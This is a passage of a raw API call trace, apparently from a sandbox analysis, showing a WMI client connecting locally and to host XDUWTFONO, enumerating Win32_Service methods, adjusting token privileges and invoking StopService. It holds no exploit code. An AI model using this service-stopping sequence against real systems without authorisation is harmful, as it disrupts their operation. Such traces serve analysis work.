(Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0244.120] lstrlenW (lpString="LIST") returned 4 [0244.120] lstrlenW (lpString="call") returned 4 [0244.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0244.120] lstrlenW (lpString="SET") returned 3 [0244.120] lstrlenW (lpString="call") returned 4 [0244.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0244.120] lstrlenW (lpString="CREATE") returned 6 [0244.120] lstrlenW (lpString="call") returned 4 [0244.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0244.120] lstrlenW (lpString="CALL") returned 4 [0244.120] lstrlenW (lpString="call") returned 4 [0244.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0244.120] lstrlenW (lpString="/") returned 1 [0244.120] lstrlenW (lpString="stopservice") returned 11 [0244.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0244.120] lstrlenW (lpString="-") returned 1 [0244.120] lstrlenW (lpString="stopservice") returned 11 [0244.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0244.120] lstrlenW (lpString="stopservice") returned 11 [0244.120] malloc (_Size=0x18) returned 0x45cbc0 [0244.120] lstrlenW (lpString="stopservice") returned 11 [0244.120] ??0CHString@@QEAA@XZ () returned 0xcd7d8 [0244.120] GetCurrentThreadId () returned 0x36c [0244.121] GetCurrentThreadId () returned 0x36c [0244.121] ??0CHString@@QEAA@XZ () returned 0xcd5a8 [0244.121] malloc (_Size=0x8) returned 0x45cf60 [0244.121] malloc (_Size=0x18) returned 0x45cbe0 [0244.121] malloc (_Size=0x18) returned 0x45cc00 [0244.121] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e11390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff962950 | out: ppNamespace=0xff962950*=0x1e23a98) returned 0x0 [0244.141] free (_Block=0x45cc00) [0244.141] CoSetProxyBlanket (pProxy=0x1e23a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0244.141] free (_Block=0x45cf60) [0244.141] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.141] free (_Block=0x45cbe0) [0244.141] malloc (_Size=0x18) returned 0x45cbe0 [0244.141] IWbemServices:GetObject (in: This=0x1e23a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xcd7b8*=0x0, ppCallResult=0x0 | out: ppObject=0xcd7b8*=0x1e4bfa0, ppCallResult=0x0) returned 0x0 [0244.165] free (_Block=0x45cbe0) [0244.165] IWbemClassObject:BeginMethodEnumeration (This=0x1e4bfa0, lEnumFlags=0) returned 0x0 [0244.165] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="StartService", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c4a0) returned 0x0 [0244.165] lstrlenW (lpString="StartService") returned 12 [0244.165] lstrlenW (lpString="stopservice") returned 11 [0244.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0244.165] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0244.165] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="StopService", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c4a0) returned 0x0 [0244.165] lstrlenW (lpString="StopService") returned 11 [0244.165] lstrlenW (lpString="stopservice") returned 11 [0244.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0244.166] malloc (_Size=0x70) returned 0x45d000 [0244.166] ??0CHString@@QEAA@XZ () returned 0xcd168 [0244.166] GetCurrentThreadId () returned 0x36c [0244.166] IWbemClassObject:GetNames (in: This=0x1e4c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xcd160 | out: pNames=0xcd160*="\x01ƀ\x08") returned 0x0 [0244.166] SafeArrayGetLBound (in: psa=0x264af0, nDim=0x1, plLbound=0xcd178 | out: plLbound=0xcd178) returned 0x0 [0244.166] SafeArrayGetUBound (in: psa=0x264af0, nDim=0x1, plUbound=0xcd174 | out: plUbound=0xcd174) returned 0x0 [0244.166] SafeArrayGetElement (in: psa=0x264af0, rgIndices=0xcd154, pv=0xcd158 | out: pv=0xcd158) returned 0x0 [0244.166] malloc (_Size=0x48) returned 0x45cf60 [0244.166] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1e4c4a0, wszProperty="ReturnValue", ppQualSet=0xccfa8 | out: ppQualSet=0xccfa8*=0x1e113b0) returned 0x0 [0244.167] malloc (_Size=0x18) returned 0x45cbe0 [0244.167] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="CIMTYPE", lFlags=0, pVal=0xcd030*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0xcd030*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0244.167] free (_Block=0x45cbe0) [0244.167] malloc (_Size=0x18) returned 0x45cbe0 [0244.167] IWbemClassObject:Get (in: This=0x1e4c4a0, wszName="ReturnValue", lFlags=0, pVal=0xcd0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xccfb8*=839680, plFlavor=0x0 | out: pVal=0xcd0d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xccfb8*=19, plFlavor=0x0) returned 0x0 [0244.167] malloc (_Size=0x18) returned 0x45cc00 [0244.167] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="read", lFlags=0, pVal=0xccfc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff962ac0), plFlavor=0x0 | out: pVal=0xccfc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff962ac0), plFlavor=0x0) returned 0x80041002 [0244.167] free (_Block=0x45cc00) [0244.167] malloc (_Size=0x18) returned 0x45cc00 [0244.167] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="write", lFlags=0, pVal=0xccfc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff962ac0), plFlavor=0x0 | out: pVal=0xccfc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff962ac0), plFlavor=0x0) returned 0x80041002 [0244.167] free (_Block=0x45cc00) [0244.167] malloc (_Size=0x18) returned 0x45cc00 [0244.168] malloc (_Size=0x18) returned 0x45cc20 [0244.168] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="Description", lFlags=0, pVal=0xcd070*(varType=0x0, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0xff904293, varVal2=0xcd078), plFlavor=0x0 | out: pVal=0xcd070*(varType=0x0, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0xff904293, varVal2=0xcd078), plFlavor=0x0) returned 0x80041002 [0244.168] free (_Block=0x45cc20) [0244.168] malloc (_Size=0x18) returned 0x45cc20 [0244.168] lstrlenA (lpString="Not Available") returned 13 [0244.168] malloc (_Size=0x1c) returned 0x45d080 [0244.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8f22f0, cbMultiByte=-1, lpWideCharStr=0x45d080, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0244.168] free (_Block=0x45d080) [0244.168] IUnknown:Release (This=0x1e113b0) returned 0x0 [0244.168] malloc (_Size=0x48) returned 0x45d080 [0244.168] malloc (_Size=0x18) returned 0x45cc40 [0244.168] malloc (_Size=0x48) returned 0x45d0d0 [0244.168] malloc (_Size=0x70) returned 0x45d120 [0244.168] malloc (_Size=0x48) returned 0x45d1a0 [0244.168] free (_Block=0x45d0d0) [0244.168] free (_Block=0x45d080) [0244.169] free (_Block=0x45cf60) [0244.169] free (_Block=0x45cc00) [0244.169] free (_Block=0x45cc20) [0244.169] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.169] IWbemClassObject:GetMethodQualifierSet (in: This=0x1e4bfa0, wszMethod="StopService", ppQualSet=0xcd6d8 | out: ppQualSet=0xcd6d8*=0x1e113b0) returned 0x0 [0244.169] malloc (_Size=0x18) returned 0x45cc20 [0244.169] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="Implemented", lFlags=0, pVal=0xcd6e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41dfce31bc, varVal2=0xff9044fb), plFlavor=0x0 | out: pVal=0xcd6e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41dfce31bc, varVal2=0xff9044fb), plFlavor=0x0) returned 0x80041002 [0244.169] free (_Block=0x45cc20) [0244.169] malloc (_Size=0x18) returned 0x45cc20 [0244.169] malloc (_Size=0x18) returned 0x45cc00 [0244.169] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="Description", lFlags=0, pVal=0xcd700*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff962948, varVal2=0x36c), plFlavor=0x0 | out: pVal=0xcd700*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x36c), plFlavor=0x0) returned 0x0 [0244.169] free (_Block=0x45cc00) [0244.169] malloc (_Size=0x18) returned 0x45cc00 [0244.169] IUnknown:Release (This=0x1e113b0) returned 0x0 [0244.169] malloc (_Size=0x70) returned 0x45d080 [0244.169] malloc (_Size=0x70) returned 0x45d1f0 [0244.169] malloc (_Size=0x48) returned 0x45cf60 [0244.170] malloc (_Size=0x18) returned 0x45cc60 [0244.170] malloc (_Size=0x70) returned 0x45d270 [0244.170] malloc (_Size=0x70) returned 0x45d2f0 [0244.170] malloc (_Size=0x48) returned 0x45d370 [0244.170] malloc (_Size=0x50) returned 0x45d3c0 [0244.170] malloc (_Size=0x70) returned 0x45d420 [0244.170] malloc (_Size=0x70) returned 0x45d4a0 [0244.170] malloc (_Size=0x48) returned 0x45d520 [0244.170] free (_Block=0x45d370) [0244.170] free (_Block=0x45d2f0) [0244.170] free (_Block=0x45d270) [0244.170] free (_Block=0x45cf60) [0244.170] free (_Block=0x45d1f0) [0244.170] free (_Block=0x45d080) [0244.170] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0244.170] free (_Block=0x45d1a0) [0244.170] free (_Block=0x45d120) [0244.170] free (_Block=0x45d000) [0244.170] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="PauseService", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c4a0) returned 0x0 [0244.170] lstrlenW (lpString="PauseService") returned 12 [0244.170] lstrlenW (lpString="stopservice") returned 11 [0244.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0244.170] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0244.170] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="ResumeService", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c4a0) returned 0x0 [0244.170] lstrlenW (lpString="ResumeService") returned 13 [0244.170] lstrlenW (lpString="stopservice") returned 11 [0244.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0244.170] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0244.170] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="InterrogateService", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c4a0) returned 0x0 [0244.171] lstrlenW (lpString="InterrogateService") returned 18 [0244.171] lstrlenW (lpString="stopservice") returned 11 [0244.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0244.171] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0244.171] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="UserControlService", ppInSignature=0xcd7a0*=0x1e4c520, ppOutSignature=0xcd7a8*=0x1e4ca20) returned 0x0 [0244.171] lstrlenW (lpString="UserControlService") returned 18 [0244.171] lstrlenW (lpString="stopservice") returned 11 [0244.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0244.171] IUnknown:Release (This=0x1e4c520) returned 0x0 [0244.171] IUnknown:Release (This=0x1e4ca20) returned 0x0 [0244.171] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="Create", ppInSignature=0xcd7a0*=0x1e4e470, ppOutSignature=0xcd7a8*=0x1e4e970) returned 0x0 [0244.171] lstrlenW (lpString="Create") returned 6 [0244.171] lstrlenW (lpString="stopservice") returned 11 [0244.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0244.171] IUnknown:Release (This=0x1e4e470) returned 0x0 [0244.171] IUnknown:Release (This=0x1e4e970) returned 0x0 [0244.171] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="Change", ppInSignature=0xcd7a0*=0x1e4e1f0, ppOutSignature=0xcd7a8*=0x1e4e6f0) returned 0x0 [0244.172] lstrlenW (lpString="Change") returned 6 [0244.172] lstrlenW (lpString="stopservice") returned 11 [0244.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0244.172] IUnknown:Release (This=0x1e4e1f0) returned 0x0 [0244.172] IUnknown:Release (This=0x1e4e6f0) returned 0x0 [0244.172] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="ChangeStartMode", ppInSignature=0xcd7a0*=0x1e4c610, ppOutSignature=0xcd7a8*=0x1e4cb10) returned 0x0 [0244.172] lstrlenW (lpString="ChangeStartMode") returned 15 [0244.172] lstrlenW (lpString="stopservice") returned 11 [0244.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0244.172] IUnknown:Release (This=0x1e4c610) returned 0x0 [0244.172] IUnknown:Release (This=0x1e4cb10) returned 0x0 [0244.172] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="Delete", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c4a0) returned 0x0 [0244.172] lstrlenW (lpString="Delete") returned 6 [0244.172] lstrlenW (lpString="stopservice") returned 11 [0244.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0244.172] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0244.172] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="GetSecurityDescriptor", ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x1e4c640) returned 0x0 [0244.172] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0244.172] lstrlenW (lpString="stopservice") returned 11 [0244.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0244.172] IUnknown:Release (This=0x1e4c640) returned 0x0 [0244.172] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*="SetSecurityDescriptor", ppInSignature=0xcd7a0*=0x1e4c520, ppOutSignature=0xcd7a8*=0x1e4ca20) returned 0x0 [0244.172] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0244.172] lstrlenW (lpString="stopservice") returned 11 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0244.173] IUnknown:Release (This=0x1e4c520) returned 0x0 [0244.173] IUnknown:Release (This=0x1e4ca20) returned 0x0 [0244.173] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0 | out: pstrName=0xcd798*=0x0, ppInSignature=0xcd7a0*=0x0, ppOutSignature=0xcd7a8*=0x0) returned 0x40005 [0244.173] IUnknown:Release (This=0x1e4bfa0) returned 0x0 [0244.173] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.173] lstrlenW (lpString="SET") returned 3 [0244.173] lstrlenW (lpString="call") returned 4 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0244.173] lstrlenW (lpString="CREATE") returned 6 [0244.173] lstrlenW (lpString="call") returned 4 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0244.173] free (_Block=0x458600) [0244.173] malloc (_Size=0x8) returned 0x45cf60 [0244.173] lstrlenW (lpString="GET") returned 3 [0244.173] lstrlenW (lpString="call") returned 4 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0244.173] lstrlenW (lpString="LIST") returned 4 [0244.173] lstrlenW (lpString="call") returned 4 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0244.173] lstrlenW (lpString="ASSOC") returned 5 [0244.173] lstrlenW (lpString="call") returned 4 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0244.173] WbemLocator:IUnknown:AddRef (This=0x1e11390) returned 0x3 [0244.173] free (_Block=0x456a60) [0244.173] lstrlenW (lpString="") returned 0 [0244.173] lstrlenW (lpString="XDUWTFONO") returned 9 [0244.173] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0244.173] lstrlenW (lpString="XDUWTFONO") returned 9 [0244.173] malloc (_Size=0x14) returned 0x45cc80 [0244.173] lstrlenW (lpString="XDUWTFONO") returned 9 [0244.173] GetCurrentThreadId () returned 0x36c [0244.173] GetCurrentProcess () returned 0xffffffffffffffff [0244.173] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xcfae0 | out: TokenHandle=0xcfae0*=0x298) returned 1 [0244.174] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfad8 | out: TokenInformation=0x0, ReturnLength=0xcfad8) returned 0 [0244.174] malloc (_Size=0x118) returned 0x45d000 [0244.174] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x45d000, TokenInformationLength=0x118, ReturnLength=0xcfad8 | out: TokenInformation=0x45d000, ReturnLength=0xcfad8) returned 1 [0244.174] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x45d000*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1668496895, Attributes=0xb8f5), (Luid.LowPart=0x0, Luid.HighPart=4575104, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=1, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0244.174] free (_Block=0x45d000) [0244.174] CloseHandle (hObject=0x298) returned 1 [0244.174] lstrlenW (lpString="GET") returned 3 [0244.174] lstrlenW (lpString="call") returned 4 [0244.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0244.174] lstrlenW (lpString="LIST") returned 4 [0244.174] lstrlenW (lpString="call") returned 4 [0244.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0244.174] lstrlenW (lpString="SET") returned 3 [0244.174] lstrlenW (lpString="call") returned 4 [0244.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0244.174] lstrlenW (lpString="CALL") returned 4 [0244.174] lstrlenW (lpString="call") returned 4 [0244.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0244.174] ??0CHString@@QEAA@XZ () returned 0xcfa90 [0244.174] GetCurrentThreadId () returned 0x36c [0244.174] malloc (_Size=0x18) returned 0x45cca0 [0244.174] malloc (_Size=0x18) returned 0x45ccc0 [0244.174] malloc (_Size=0x18) returned 0x45cce0 [0244.175] malloc (_Size=0x18) returned 0x45cd00 [0244.175] malloc (_Size=0x18) returned 0x45d5a0 [0244.175] SysStringLen (param_1="\\\\") returned 0x2 [0244.175] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0244.175] malloc (_Size=0x18) returned 0x45d5c0 [0244.175] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0244.175] SysStringLen (param_1="\\") returned 0x1 [0244.175] malloc (_Size=0x18) returned 0x45d5e0 [0244.175] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0244.175] SysStringLen (param_1="root\\cimv2") returned 0xa [0244.175] free (_Block=0x45d5c0) [0244.175] free (_Block=0x45d5a0) [0244.175] free (_Block=0x45cd00) [0244.175] free (_Block=0x45cce0) [0244.176] free (_Block=0x45ccc0) [0244.176] free (_Block=0x45cca0) [0244.176] malloc (_Size=0x18) returned 0x45cca0 [0244.176] malloc (_Size=0x18) returned 0x45ccc0 [0244.176] malloc (_Size=0x18) returned 0x45cce0 [0244.176] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e11390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9629d0 | out: ppNamespace=0xff9629d0*=0x1e23b28) returned 0x0 [0244.179] free (_Block=0x45cce0) [0244.179] free (_Block=0x45ccc0) [0244.179] free (_Block=0x45cca0) [0244.179] CoSetProxyBlanket (pProxy=0x1e23b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0244.179] free (_Block=0x45d5e0) [0244.179] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.179] ??0CHString@@QEAA@XZ () returned 0xcf838 [0244.179] GetCurrentThreadId () returned 0x36c [0244.179] malloc (_Size=0x70) returned 0x45d000 [0244.179] malloc (_Size=0x50) returned 0x45d080 [0244.179] malloc (_Size=0x50) returned 0x45d0e0 [0244.179] malloc (_Size=0x70) returned 0x45d140 [0244.179] malloc (_Size=0x70) returned 0x45d1c0 [0244.179] malloc (_Size=0x48) returned 0x45d240 [0244.179] malloc (_Size=0x18) returned 0x45cca0 [0244.180] lstrlenA (lpString="") returned 0 [0244.180] malloc (_Size=0x2) returned 0x456a60 [0244.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8f314c, cbMultiByte=-1, lpWideCharStr=0x456a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0244.180] free (_Block=0x456a60) [0244.180] malloc (_Size=0x70) returned 0x45d290 [0244.180] malloc (_Size=0x48) returned 0x45d310 [0244.180] malloc (_Size=0x18) returned 0x45ccc0 [0244.180] free (_Block=0x45cca0) [0244.180] IWbemServices:GetObject (in: This=0x1e23b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xcf868*=0x0, ppCallResult=0x0 | out: ppObject=0xcf868*=0x1e4c030, ppCallResult=0x0) returned 0x0 [0244.195] malloc (_Size=0x18) returned 0x45cca0 [0244.195] IWbemClassObject:GetMethod (in: This=0x1e4c030, wszName="stopservice", 